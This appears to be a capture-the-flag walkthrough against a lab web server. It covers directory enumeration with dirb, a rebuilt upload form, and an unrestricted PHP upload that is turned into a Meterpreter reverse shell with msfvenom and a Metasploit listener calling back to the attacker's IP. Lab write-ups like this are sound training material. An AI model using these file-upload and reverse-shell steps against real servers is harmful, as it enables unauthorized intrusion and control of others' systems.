172.16.64.91    75ajvxi36vchsv584es1.foocorp.io

Visiting 172.16.64.91 directly brings us to the default Apache page, but once we add:

172.16.64.91    75ajvxi36vchsv584es1.foocorp.io

to our local /etc/hosts file we get a different page: 404 Not Found, oops. Ok, time to enumerate with dirb.


┌──(root💀kali)-[~]
└─# dirb http://75ajvxi36vchsv584es1.foocorp.io

dirb finds http://75ajvxi36vchsv584es1.foocorp.io/app

So this page comes up with an annoying JavaScript pop-up all the time. Besides that, the page has an upload form that doesn't work; inspecting the source code, it points to 'upload/upload.php'. We can rebuild the form locally with an absolute action URL as follows:

<html>
   <body style="background: black; color: white;">
      <script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
      <center>
         <div style="border: 1px yellow double">
            <br /><br />
            <form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload/upload.php" method="post" enctype="multipart/form-data">
               <br />Select  file to upload:
               <input type="file" name="fileToUpload" id="fileToUpload">
               <input type="submit" value="Upload" name="submit">
            </form>
            <br /><br />
         </div>
      </center>
      <hr />
      <br />
      <center>&copy; FooCORP 2021</center>
   </body>
</html>

With this modification the app still seems broken. Let's check whether dirb found something else. Indeed, /app/ has another path we can visit: app/upload, which redirects to upload.php.
Let's modify in Burp and use http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php, instead of http://75ajvxi36vchsv584es1.foocorp.io/app/upload/upload.php

<html>
   <body style="background: black; color: white;">
      <script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
      <center>
         <div style="border: 1px yellow double">
            <br /><br />
            <form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php" method="post" enctype="multipart/form-data">
               <br />Select  file to upload:
               <input type="file" name="fileToUpload" id="fileToUpload">
               <input type="submit" value="Upload" name="submit">
            </form>
            <br /><br />
         </div>
      </center>
      <hr />
      <br />
      <center>FooCORP 2021</center>
   </body>
</html>

Now, let's upload a simple PHP file that we name php.php:
<?php
phpinfo();
?>


The file is stored and accessible on /app/upload/

Ok, since this works we can now set up a listener with metasploit, create a meterpreter php file with msfvenom and upload the meterpreter php file to get a shell.
Metasploit listener:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 172.16.64.12
lhost => 172.16.64.12
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

Remember that we need to run Metasploit as root if we want to listen on ports in the range 1-1024. Ok, let's create the meterpreter PHP file:
$ msfvenom -p php/meterpreter_reverse_tcp lhost=172.16.64.12 lport=443 -o shell.php

We can upload shell.php the same way as php.php. A meterpreter session opens instantly, and there we enter:

$ shell
$ bash -i

And that's it. From here we simply navigate the directories and find the missing flag!